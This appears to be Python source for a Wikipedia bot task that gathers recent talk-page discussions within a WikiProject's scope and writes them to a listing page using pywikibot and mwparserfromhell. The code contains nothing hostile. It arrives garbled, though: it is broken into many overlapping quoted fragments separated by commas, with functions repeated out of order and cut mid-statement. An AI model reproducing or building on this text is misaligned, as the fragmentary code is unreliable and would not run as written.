= 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a", "the most recent discussion tuples.\"\"\" sections = {} for page in pages: title", "discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to", "= [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"])", "start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\"", "start, end): \"\"\"Return a dict mapping talk page titles to lists of section", "\"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for", "button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list", "= \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after +", "namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within", "as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title)", "Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template", "[(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict", "sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for", "return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\":", "%(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [", "discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name,", "in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize =", "self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project", "= section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp =", "(UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for the given", "page titles to lists of section tuples. Given a WikiProject new discussions page,", "{{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX", "\"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button", "range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >=", "return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list", "in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news", "discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]]", "< ? AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND", "\"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions]", "of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE", "sections for %s pages\", len(titles)) sections = {} chunksize = 50 for start", "news = [disc.title for disc in discussions if disc.title not in current][:3] return", "\"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data", "mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match =", "rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\")", "self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name", "2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import", "in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the", "except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles):", "to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude>", "under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime", "datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if", "_get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={", "else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text", "+ \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self,", "except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\",", "\"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def", "sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists", "all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions =", "title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] =", "reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title,", "pages = self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text) except", "{{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX", "disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text %", "= {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list", "if news: summary += \": \" + \", \".join(\"[[%s]]\" % item for item", "cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize = 50", "discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of", "FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace %", "page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text)", "at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc", "1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts", "ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles))", "except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return", "news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given", "[\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list", "and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title", "= {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not", "_parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text),", "only pages included in the dict are those that have been updated in", "_get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists of section", "in the given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM", "\"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc", "mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a", "updated: sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions =", "\"Updating new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" %", "news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end)", "_extract_sections(self, text): \"\"\"Return a list of section tuples for the given page.\"\"\" code", "mapping talk page titles to lists of section tuples. The only pages included", "a chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except", "have been updated in the given time range. \"\"\" query = \"\"\"SELECT DISTINCT", "} summary = \"Updating new discussions\" if news: summary += \": \" +", "self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title", "updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\",", "sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in sections for", "chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try:", "data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start,", "% item for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process", "def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site,", "endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections", "%Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for the", "elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for", "list of the most recent discussion tuples.\"\"\" sections = {} for page in", "for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name", "parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles)", "% 2 = 1 AND rc_namespace != 3 AND (rc_type = 0 OR", "match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except", "in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current,", "of the most recent discussion tuples.\"\"\" sections = {} for page in pages:", "= self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if", "list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template %", "new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title", "title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news", "discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d", "of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME>", "mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue", "= \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist", "1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1", "discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if", "= before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk", "\"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new", "[\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a", "3 AND (rc_type = 0 OR rc_type = 1 OR rc_type = 3)", "in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title)", "projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news: summary +=", "list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button", "from collections import namedtuple from datetime import datetime import re from reportsbot.task import", "updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems =", "try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return", "= start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts,", "WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}}", "updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"):", "[[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page", "discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title =", "New Discussions -- Provides a list of new discussions within a WikiProject's scope", "rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1 OR rc_type", "= [disc.title for disc in discussions if disc.title not in current][:3] return discussions,", "0 OR rc_type = 1 OR rc_type = 3) AND rc_bot = 0\"\"\"", "= end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb", "\"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\",", "disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold", "the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last", "pages\", len(titles)) sections = {} chunksize = 50 for start in range(0, len(titles),", "return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions", "(UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold:", "import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\",", "summary += \": \" + \", \".join(\"[[%s]]\" % item for item in news)", "= titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title] =", "match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name,", "rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace", "given list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable", "before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk =", "in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text", "try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections", "= str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of", "[\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class", "= discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y", "in the dict are those that have been updated in the given time", "<NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple", "\"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news: summary", "{section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of", "discussion tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns", "current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end =", "discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news =", "{{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX", "{ \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for", "updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp)", "_get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping", "The only pages included in the dict are those that have been updated", "of section tuples. Given a WikiProject new discussions page, return all discussions currently", "project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages", "from datetime import datetime import re from reportsbot.task import Task from reportsbot.util import", "0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and", "template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title,", "= self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk,", "for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y", "self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end", "WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace % 2 =", "= self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError:", "IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\",", "%m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not", "%B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for", "section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True)", "and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value)", "AND rc_timestamp < ? AND rc_namespace % 2 = 1 AND rc_namespace !=", "between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts))", "cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in", "namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a", "title in updated: sections[title] = updated[title] elif title in current: sections[title] = current[title]", "startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\",", "project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for", "% { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") }", "tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title =", "join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] = updated[title] elif", "= [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B", "50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk)", "\"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text =", "= \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable", "\"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return", "disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title", "given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE", "\"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M,", "recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace % 2", "page.title) if title in updated: sections[title] = updated[title] elif title in current: sections[title]", "lists of section tuples. Given a WikiProject new discussions page, return all discussions", "titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for", "scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod", "WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org", "\"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"]", "%Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) >", "a dict mapping talk page titles to lists of section tuples. The only", "tuples. Given a WikiProject new discussions page, return all discussions currently listed. \"\"\"", "_process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions", "the given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges", "discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted", "\", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self, project,", "news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions", "http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import re from", "return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a", "for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions", "try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\":", "= project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title,", "chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title]", "for %s pages\", len(titles)) sections = {} chunksize = 50 for start in", "of section tuples. The only pages included in the dict are those that", "sections = {} chunksize = 50 for start in range(0, len(titles), chunksize): chunk", "import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section =", "= self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if", "Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\"", "discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most", "+ \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text", "self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated", "self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self):", "3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions", "\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in", "of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return", "[[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for", "= self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist", "\".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self, project, updated):", "pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion =", "in updated: sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions", "discussions, news): \"\"\"Save the given list of discussions to the given page title.\"\"\"", "(startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching", "\"\"\"Return a list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text)", "for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc", "timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections", "rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type = 0", "> fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\"", "timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def", "title, discussions, news): \"\"\"Save the given list of discussions to the given page", "\"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\":", "projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title,", "chunksize = 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages", "datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B", "str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] =", "\"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\"", "[join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\",", "%d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not in", "page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist", "not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save", "join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\",", "_Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions", "def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating", "continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value)", "of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set()", "for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not", "import datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title import", "for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title", "text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content=", "template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\")", "discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated):", "= 